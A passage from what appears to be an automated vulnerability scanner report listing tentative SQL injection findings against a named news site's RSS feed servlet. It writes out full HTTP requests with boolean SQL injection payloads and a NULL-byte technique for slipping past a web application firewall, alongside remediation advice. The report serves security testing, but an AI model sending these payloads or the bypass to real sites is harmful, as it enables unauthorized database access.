<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200749.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:12 GMT
Date: Tue, 07 Dec 2010 23:19:12 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.32. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200749.xml [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200749.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200749.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200749.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:28 GMT
Content-Length: 13375
Connection: close
Set-Cookie: JSESSIONID=X5FMJQDGGCUWMCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.33. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200750.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200750.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 65316758'%20or%201%3d1--%20 and 65316758'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d1--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:20 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56865316758'%20or%201%3d2--%20/200750.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.34. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:27 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:27 GMT
Content-Length: 0
Connection: close


1.35. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200753.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200753.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 47711278%20or%201%3d1--%20 and 47711278%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d1--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet/56847711278%20or%201%3d2--%20/200753.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.36. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200754.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200754.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 87447082'%20or%201%3d1--%20 and 87447082'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi87447082'%20or%201%3d1--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi87447082'%20or%201%3d2--%20/rss/CustomRssServlet/568/200754.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:26 GMT
Date: Tue, 07 Dec 2010 23:19:26 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.37. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200756.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200756.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200756.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 0
Connection: close


1.38. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:01 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:01 GMT
Date: Tue, 07 Dec 2010 23:21:01 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.39. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200757.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200757.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568%20and%201%3d1--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:11 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568%20and%201%3d2--%20/200757.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:11 GMT
Content-Length: 0
Connection: close


1.40. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 24161260'%20or%201%3d1--%20 and 24161260'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d1--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet24161260'%20or%201%3d2--%20/568/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:00 GMT
Content-Length: 0
Connection: close


1.41. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200759.xml [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200759.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 35561059%20or%201%3d1--%20 and 35561059%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d1--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
